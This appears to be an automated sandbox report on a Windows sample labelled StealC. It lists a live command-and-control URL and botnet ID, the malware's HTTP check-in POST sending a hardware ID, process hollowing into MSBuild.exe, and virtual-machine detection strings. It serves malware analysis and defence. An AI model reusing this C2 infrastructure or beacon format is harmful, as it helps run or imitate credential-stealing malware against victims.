Source: 3.2.MSBuild.exe.400000.0.unpack |
Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"} |
Source: unknown |
HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49713 version: TLS 1.0 |
Source: unknown |
HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49752 version: TLS 1.0 |
Source: unknown |
HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49746 version: TLS 1.0 |
Source: 1f13Cs1ogc.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: Malware configuration extractor |
URLs: http://62.204.41.150/edd20096ecef326d.php |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 33 39 42 45 35 35 44 37 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="hwid"4239BE55D7561166170430------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="build"default6_doz------GDGIJECGDGCBKECAKFBG-- |
Source: Joe Sandbox View |
JA3 fingerprint: 1138de370e523e824bbca92d049a3777 |
Source: Joe Sandbox View |
JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4 |
Source: unknown |
HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49713 version: TLS 1.0 |
Source: unknown |
HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49752 version: TLS 1.0 |
Source: unknown |
HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49746 version: TLS 1.0 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_00406280 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, |
3_2_00406280 |
Source: unknown |
HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 33 39 42 45 35 35 44 37 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="hwid"4239BE55D7561166170430------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="build"default6_doz------GDGIJECGDGCBKECAKFBG-- |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150 |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/ |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/bJ |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E64000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php5 |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/j |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150t |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150~ |
Source: Amcache.hve.7.dr |
String found in binary or memory: http://upx.sf.net |
Source: unknown |
Network traffic detected: HTTP traffic on port 49733 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49744 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49743 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49742 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49741 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49740 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49727 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49743 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49746 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49738 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49736 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49737 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49736 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49735 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49734 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49733 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49675 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49731 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49703 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49724 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49742 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49728 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49749 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49729 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49752 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49728 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49727 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49726 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49725 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49735 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49724 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49723 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49722 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49674 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49712 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49725 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49741 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49729 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49748 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49719 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49722 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49719 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49751 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49712 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49738 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49734 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49673 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49752 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49751 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49750 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49726 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49740 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49747 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49744 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49723 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49750 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49749 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49748 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49703 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49747 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49737 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49746 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE2021 |
0_2_00FE2021 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE729C |
0_2_00FE729C |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FFD39B |
0_2_00FFD39B |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FF572C |
0_2_00FF572C |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_0103094F |
0_2_0103094F |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FECAF2 |
0_2_00FECAF2 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FFBB36 |
0_2_00FFBB36 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FF3C92 |
0_2_00FF3C92 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE1D79 |
0_2_00FE1D79 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FEFEF0 |
0_2_00FEFEF0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: String function: 004045C0 appears 317 times |
|
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: String function: 00FE7B80 appears 49 times |
|
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288 |
Source: 1f13Cs1ogc.exe, 00000000.00000000.2073157229.000000000105C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameproquota.exej% vs 1f13Cs1ogc.exe |
Source: 1f13Cs1ogc.exe |
Binary or memory string: OriginalFilenameproquota.exej% vs 1f13Cs1ogc.exe |
Source: classification engine |
Classification label: mal100.troj.evad.winEXE@8/5@0/1 |
Source: C:\Windows\SysWOW64\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6352 |
Source: 1f13Cs1ogc.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: unknown |
Process created: C:\Users\user\Desktop\1f13Cs1ogc.exe "C:\Users\user\Desktop\1f13Cs1ogc.exe" |
|
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
|
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
|
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
|
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288 |
|
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Jump to behavior |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Jump to behavior |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Jump to behavior |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: rstrtmgr.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: 1f13Cs1ogc.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: 1f13Cs1ogc.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: 1f13Cs1ogc.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: 1f13Cs1ogc.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: 1f13Cs1ogc.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: 1f13Cs1ogc.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: 1f13Cs1ogc.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: 1f13Cs1ogc.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: 1f13Cs1ogc.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: 1f13Cs1ogc.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: 1f13Cs1ogc.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: 1f13Cs1ogc.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, |
3_2_0041C03D |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE71AD push ecx; ret |
0_2_00FE71C0 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_01027F0D push ecx; ret |
0_2_01027F20 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_0041B035 push ecx; ret |
3_2_0041B048 |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware Virtual USB Mouse |
Source: Amcache.hve.7.dr |
Binary or memory string: vmci.syshbin |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware, Inc. |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware20,1hbin@ |
Source: Amcache.hve.7.dr |
Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563 |
Source: Amcache.hve.7.dr |
Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.7.dr |
Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E64000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: Amcache.hve.7.dr |
Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.7.dr |
Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev |
Source: Amcache.hve.7.dr |
Binary or memory string: c:/windows/system32/drivers/vmci.sys |
Source: Amcache.hve.7.dr |
Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.7.dr |
Binary or memory string: vmci.sys |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0 |
Source: Amcache.hve.7.dr |
Binary or memory string: vmci.syshbin` |
